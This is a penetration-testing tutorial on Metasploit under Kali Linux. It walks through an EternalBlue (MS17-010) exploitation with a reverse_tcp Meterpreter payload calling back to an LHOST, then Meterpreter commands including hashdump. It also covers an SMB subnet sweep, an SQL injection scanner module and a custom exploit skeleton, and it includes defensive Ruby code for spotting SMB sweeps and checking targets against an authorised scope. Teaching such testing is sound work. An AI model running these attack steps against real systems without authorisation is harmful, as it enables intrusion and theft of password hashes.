Using Metasploit Framework on Kali Linux: A Step-by-Step Guide

The Metasploit Framework is a powerful tool that has become a staple in the arsenal of cybersecurity professionals. Whether you’re a penetration tester, security researcher, or simply interested in learning more about cybersecurity, Metasploit provides a robust platform for discovering, exploiting, and validating vulnerabilities in various systems. When paired with Kali Linux, a penetration testing-focused operating system, the potential for effective security testing becomes even more pronounced.

In this comprehensive guide, we’ll walk you through the basics of Metasploit, how to install it on Kali Linux, and explore its various features with step-by-step examples.

What is Metasploit Framework?

Metasploit is an open-source platform for developing, testing, and executing exploit code. It was initially created by H.D. Moore in 2003 and has since become one of the most widely used tools in cybersecurity. Metasploit includes various modules for exploiting known vulnerabilities, payloads for executing code on target systems, and auxiliary tools for tasks like scanning and fuzzing.

Key Components of Metasploit

  1. Exploit: An exploit is a piece of code that takes advantage of a vulnerability in a system. Metasploit has a vast library of exploits that can target different platforms, applications, and network services.
  2. Payload: A payload is the code that gets executed on the target system after a successful exploit. Metasploit has several payloads that range from opening a command shell to creating a persistent backdoor.
  3. Auxiliary: Auxiliary modules are used for tasks like scanning, fuzzing, and performing brute-force attacks. They don’t exploit a vulnerability but help in the information-gathering process.
  4. Post-Exploitation: After exploiting a system, Metasploit provides post-exploitation tools to help maintain access, gather further intelligence, or pivot to other systems in the network.

Installing Metasploit on Kali Linux

Before you begin using Metasploit, make sure you have a copy of Kali Linux installed. Kali Linux typically comes with Metasploit pre-installed, but if it’s not available, you can install it with the following steps:

Update and Upgrade Kali Linux: Open a terminal and update the system repositories to ensure you have the latest package list:

sudo apt update && sudo apt upgrade -y

Install Metasploit Framework: If Metasploit is not already installed, you can install it using the package manager:

sudo apt install metasploit-framework

Verify Installation: Once installed, you can verify it by running the following command:

msfconsole

This command will start the Metasploit Console, the primary interface for interacting with the framework.

Getting Started with Metasploit

After installing Metasploit, it’s time to familiarize yourself with the msfconsole interface. This is the heart of the Metasploit Framework, allowing you to search for exploits, configure them, and launch attacks.

Starting Metasploit

To start Metasploit, open a terminal and type:

msfconsole        

You’ll be greeted with a banner and a prompt that looks like this:

msf6 >        

The msf6 prompt indicates that you’re running Metasploit version 6. From here, you can execute a variety of commands to interact with the framework.

Basic Commands in Metasploit

Here are some essential commands to get you started:

  • help: Lists all available commands in Metasploit.
  • search: Searches for exploits, auxiliary modules, or payloads. For example, you can search for exploits related to SMB (Server Message Block) with:

search smb

  • use: Loads a specific module for use. After finding a module, you can load it by typing use followed by the module path. For example:

use exploit/windows/smb/ms17_010_eternalblue

  • show options: Shows all options that you can configure for a selected module.
  • set: Sets specific options for the module. For example, you can set the RHOST (remote host) option to specify the target IP address:

set RHOST 192.168.1.10

  • exploit: Runs the selected module against the configured target.

Step-by-Step Exploitation with Metasploit

To illustrate the capabilities of Metasploit, let’s go through an example of exploiting a vulnerable machine. For this demonstration, we’ll use the MS17-010 vulnerability, famously known as the “EternalBlue” exploit, which affects Windows systems.

Step 1: Finding the Exploit

The first step is to search for the relevant exploit in Metasploit:

search ms17_010        

Metasploit will return a list of exploits related to the MS17-010 vulnerability. In this case, we’re interested in the ms17_010_eternalblue exploit.

Step 2: Loading the Exploit Module

Once we’ve identified the exploit module, we need to load it with the use command:

use exploit/windows/smb/ms17_010_eternalblue        

Step 3: Configuring the Target

After loading the exploit, use the show options command to view the required settings:

show options        

You’ll see several options, including RHOST, which specifies the target IP address. Set this option to the IP of your target system:

set RHOST 192.168.1.20        

Step 4: Setting the Payload

Metasploit requires a payload to execute after the exploit. A common choice is a reverse TCP payload, in which the target connects back to your machine and gives you a command line interface on the target; the one used here delivers that as a Meterpreter session. Set the payload as follows:

set payload windows/x64/meterpreter/reverse_tcp        

Now, set the LHOST (local host) option to your Kali Linux IP address to receive the reverse shell:

set LHOST 192.168.1.15        

Step 5: Running the Exploit

With the exploit and payload configured, you’re ready to launch the attack. Use the exploit command to execute it:

exploit        

If the exploit is successful, you’ll receive a Meterpreter session, granting you control over the target system.

Step 6: Post-Exploitation with Meterpreter

After gaining access, you can use Meterpreter to perform various actions on the target machine. Here are a few useful Meterpreter commands:

  • sysinfo: Displays information about the target system.
  • getuid: Shows the user ID you’re running under on the target.
  • hashdump: Dumps the password hashes from the target (requires elevated privileges).
  • screenshot: Takes a screenshot of the target desktop.

To exit the Meterpreter session, type:

exit        

Using Auxiliary Modules for Scanning

Metasploit isn’t just for exploitation; it also includes auxiliary modules that are useful for scanning and reconnaissance. Let’s go through an example of scanning for open SMB ports.

Step 1: Searching for the SMB Scanner

Use the search command to find auxiliary modules for SMB:

search scanner smb        

You’ll see a list of SMB scanning modules. The auxiliary/scanner/smb/smb_version module is useful for identifying the SMB version on a target.

Step 2: Loading the SMB Scanner

Load the module with the use command:

use auxiliary/scanner/smb/smb_version        

Step 3: Setting the Target Range

Set the target range using the RHOSTS option. This can be a single IP or a range:

set RHOSTS 192.168.1.0/24        

Step 4: Running the Scan

Execute the module with the run command:

run        

Metasploit will scan the specified IP range, returning information about any SMB services it finds. You can use this information to further assess potential vulnerabilities.
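From the defender's side, a sweep like this shows up as one source opening SMB (TCP 445) connections to many distinct hosts in a short time. The following is an added example, not part of the original guide: the flow-record format, the 60-second window, the threshold of 20 hosts and every sample record are constructed assumptions.

```ruby
require 'time'

SMB_PORT = 445
BASE = Time.utc(2024, 10, 14, 10, 0, 0)

# Constructed flow records: "<ISO8601 time> <src> <dst> <dst_port>".
SAMPLE_FLOWS = [
  # One host touching 40 addresses in 40 seconds (a /24 sweep in progress).
  *(1..40).map { |i| "#{(BASE + i).iso8601} 192.168.1.15 192.168.1.#{i} 445" },
  # A slow source: 25 hosts, but one every five minutes.
  *(1..25).map { |i| "#{(BASE + i * 300).iso8601} 192.168.1.40 192.168.1.#{100 + i} 445" },
  # A workstation reusing the same file server.
  *(0..4).map { |i| "#{(BASE + i).iso8601} 192.168.1.30 192.168.1.5 445" },
  'garbage line that must be skipped'
].join("\n")

# Parse records, silently dropping malformed lines.
def parse_flows(text)
  text.each_line.filter_map do |line|
    ts, src, dst, port = line.split
    next unless port
    { time: Time.iso8601(ts), src: src, dst: dst, port: Integer(port) }
  rescue ArgumentError
    nil
  end
end

# Return { source => peak distinct SMB destinations inside any window }.
def smb_sweepers(flows, window: 60, threshold: 20)
  smb = flows.select { |f| f[:port] == SMB_PORT }.group_by { |f| f[:src] }
  smb.each_with_object({}) do |(src, recs), out|
    recs = recs.sort_by { |f| f[:time] }
    start = 0
    seen = Hash.new(0) # destination => records currently inside the window
    peak = 0
    recs.each do |f|
      seen[f[:dst]] += 1
      while f[:time] - recs[start][:time] > window # evict expired records
        old = recs[start][:dst]
        seen[old] -= 1
        seen.delete(old) if seen[old].zero?
        start += 1
      end
      peak = [peak, seen.size].max
    end
    out[src] = peak if peak >= threshold
  end
end

puts smb_sweepers(parse_flows(SAMPLE_FLOWS)).inspect if __FILE__ == $0
```

The slow source stays under the threshold because the window only counts destinations seen together, so tune the window and threshold against your own baseline traffic.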

Exploiting Web Applications with Metasploit

Metasploit also supports web application exploitation, with modules for testing various vulnerabilities like SQL injection and file inclusion. Here’s an example of using a SQL injection module:

Step 1: Searching for SQL Injection Modules

Search for SQL injection modules with the following command:

search sql_injection        

Step 2: Selecting and Using a Module

Choose an appropriate module for the web application you’re testing. For example:

use auxiliary/scanner/http/sqli        

Step 3: Setting Target Options

As before, set the RHOSTS option to specify the target web server:

set RHOSTS 192.168.1.25        

Configure any other required options specific to the module and run the scan.
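Each walkthrough above types a target into RHOST or RHOSTS by hand, so a pre-flight check against the written scope of the engagement catches a mistyped address or an overly wide range before anything runs. This is an added example, not part of the original guide or of Metasploit: the function name and the lab scope of 192.168.1.0/24 are assumptions, and it handles only whitespace-separated IPs and CIDR blocks.

```ruby
require 'ipaddr'

# Assumed lab scope for illustration; replace with the ranges you are
# authorised in writing to test.
AUTHORISED_SCOPE = ['192.168.1.0/24'].freeze

# Return the entries of an RHOSTS-style string that are NOT fully contained
# in the authorised scope. Anything that does not parse as an IP or CIDR
# (hostnames, typos) is reported as out of scope, so the check fails closed.
def out_of_scope(rhosts, scope_cidrs = AUTHORISED_SCOPE)
  scope = scope_cidrs.map { |cidr| IPAddr.new(cidr) }
  rhosts.split.reject do |entry|
    begin
      range = IPAddr.new(entry).to_range
      # A CIDR target is in scope only if both of its ends are.
      scope.any? { |s| s.include?(range.begin) && s.include?(range.end) }
    rescue IPAddr::Error
      false
    end
  end
end

if __FILE__ == $0
  rejected = out_of_scope(ARGV.join(' '))
  abort "Out of scope, do not run: #{rejected.join(', ')}" unless rejected.empty?
  puts 'All targets are inside the authorised scope.'
end
```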

Creating Custom Exploits in Metasploit

Metasploit allows you to create custom exploits, which can be useful if you’ve discovered a new vulnerability or need to customize an existing exploit for specific conditions. Here’s a simple example of creating a custom exploit.

  1. Open a Text Editor: Open a text editor and create a Ruby file for your exploit. You can name it custom_exploit.rb.
  2. Add Basic Exploit Structure: Metasploit exploits are written in Ruby. Start with the basic structure:

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    # Module metadata shown by the info and show options commands
    super(update_info(info,
      'Name'           => 'Custom Exploit',
      'Description'    => 'This is a custom exploit',
      'License'        => MSF_LICENSE,
      'Author'         => 'Your Name',
      # Maximum payload size in bytes
      'Payload'        => { 'Space' => 1024 },
      'Platform'       => 'win',
      # Each target pairs a name with target-specific values (placeholder address here)
      'Targets'        => [
        ['Windows XP', { 'Ret' => 0x41414141 }]
      ],
      'DisclosureDate' => 'Oct 14 2024'
    ))
  end

  def exploit
    # Exploit code here
  end
end

  3. Add Your Exploit Code: Fill in the exploit method with your custom code. Save the file and load it into Metasploit with:

loadpath /path/to/your/custom_exploit

Conclusion

The Metasploit Framework on Kali Linux is a versatile and powerful tool for penetration testing and vulnerability assessments. Whether you’re scanning for open ports, testing for SQL injection, or creating custom exploits, Metasploit provides a wide range of capabilities for both novice and advanced users.

This guide covered the basics, but Metasploit’s true power lies in its flexibility and community support. With regular updates, new modules, and an active user base, Metasploit continues to be a critical tool in the cybersecurity landscape. As you explore and practice, always remember to operate within the legal boundaries and obtain permission before testing any system.

About the Author:

Vijay Gupta is a cybersecurity enthusiast with several years of experience in cyber security, cyber crime forensics investigation, and security awareness training in schools and colleges. With a passion for safeguarding digital environments and educating others about cybersecurity best practices, Vijay has dedicated his career to promoting cyber safety and resilience. Stay connected with Vijay Gupta on various social media platforms and professional networks to access valuable insights and stay updated on the latest cybersecurity trends.